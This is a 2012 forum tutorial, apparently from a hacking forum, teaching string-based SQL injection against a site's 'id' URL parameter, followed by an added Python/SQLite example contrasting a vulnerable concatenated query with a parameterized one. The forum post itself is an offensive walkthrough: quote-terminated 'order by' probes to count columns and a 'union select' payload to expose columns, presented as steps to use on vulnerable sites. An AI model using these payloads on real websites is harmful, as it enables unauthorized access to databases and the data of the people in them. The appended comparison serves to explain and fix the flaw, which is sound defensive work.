String-based SQL Injection Tutorial 10-30-2012, 10:55 PM
#1
String Based SQLi
Introduction
Hi all on Anarchy Forum,
In this tutorial I will show you how to do String Based SQLi.
It's very easy to do and it's like normal SQLi. This tutorial will be a short one.
So let's get started, shall we?
This type of SQLi is used when you don't get an error after the ORDER BY command, so I will show you what to do next.
Searching for error
So if you know the basics of normal SQLi you will know what ORDER BY is and when and what it's used for, so I will not explain it to you in this tutorial.
OK, we have this site (e.g.):
Code:
www.site.com/index.php?id=# --> this is some number
And you know it's vulnerable to SQLi.
Now you use ORDER BY
Code:
www.site.com/index.php?id=# order by 5--
After that the site loads normally like it was refreshed
So you go up with the number
Code:
www.site.com/index.php?id=# order by 10--
Same thing like when we had number 5
So you go up even more
Code:
www.site.com/index.php?id=# order by 99--
Same fucking thing, no error
Now we will use String based SQLi
Bypassing our no error problem
Now we try again with String Based SQLi to find number of columns
We will do that by adding ' at the end of the site's number and + after our syntax.
The syntax will look like this:
Code:
www.site.com/index.php?id=#' order by 1--+
No error (it's because there is more than 1 column)
Now we type in our syntax this:
Code:
www.site.com/index.php?id=#' order by 99--+
We got an error! YAY. (There are fewer than 99 columns, ofc.)
Now we need to find the exact number
Syntax:
Code:
www.site.com/index.php?id=#' order by 5--+
No error. Let's go up
Code:
www.site.com/index.php?id=#' order by 10--+
Error. Now let's go down, because there are fewer than 10 columns
Code:
www.site.com/index.php?id=#' order by 9--+
We got an error again, lower it more
Code:
www.site.com/index.php?id=#' order by 8--+
No error, that means that there are 8 columns.
Finding Tables and Columns
So the rest of the syntax will be like normal SQLi, but you must keep ' and +
For finding vulnerable number:
Code:
www.site.com/index.php?id=-#' union select 1,2,3,4,5,6,7,8--+
Now we got numbers on the page:
4, 1, 6 (always take the first number, e.g. 4).
That's it, guys. If you know normal SQLi you will know what to do next.
Thank you, and I hope this will be helpful. This will be my last tutorial for now because I'm on my phone, so more soon.
-crow
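Why the quote changes the result, and how a bound parameter removes the behaviour entirely: this is an added example, not part of the original post, and it assumes the page builds its query by concatenating id inside a quoted string literal. An in-memory SQLite database stands in for the site's database; the table, column and function names are constructed.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the site's table: 8 columns, as in the post."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE page (id TEXT, c2, c3, c4, c5, c6, c7, c8)")
    db.execute("INSERT INTO page VALUES ('1', 'a', 'b', 'c', 'd', 'e', 'f', 'g')")
    return db

def lookup_concatenated(db, raw_id):
    # Vulnerable pattern: the parameter is pasted inside a quoted string literal.
    # Without a quote the input stays inside that literal (never an ORDER BY
    # error); a quote ends the literal and the rest is parsed as SQL.
    return db.execute("SELECT * FROM page WHERE id = '" + raw_id + "'").fetchall()

def lookup_parameterized(db, raw_id):
    # Hardened pattern: the value is bound as data and is never parsed as SQL.
    return db.execute("SELECT * FROM page WHERE id = ?", (raw_id,)).fetchall()

def outcome(lookup, db, raw_id):
    """Return 'rows=N' or 'sql-error' so the two patterns can be compared."""
    try:
        return "rows=%d" % len(lookup(db, raw_id))
    except sqlite3.Error:
        return "sql-error"

# The post's inputs after URL decoding ('+' becomes a space), with id 1.
PROBES = ["1", "1 order by 99-- ", "1' order by 8-- ", "1' order by 9-- "]

def compare():
    """Map each probe to (concatenated outcome, parameterized outcome)."""
    db = make_db()
    return {p: (outcome(lookup_concatenated, db, p),
                outcome(lookup_parameterized, db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (concat, bound) in compare().items():
        print("%-20r concatenated: %-10s parameterized: %s" % (probe, concat, bound))
```

With the bound parameter, every probe is just an id value that matches no row, so the response no longer varies with the column count.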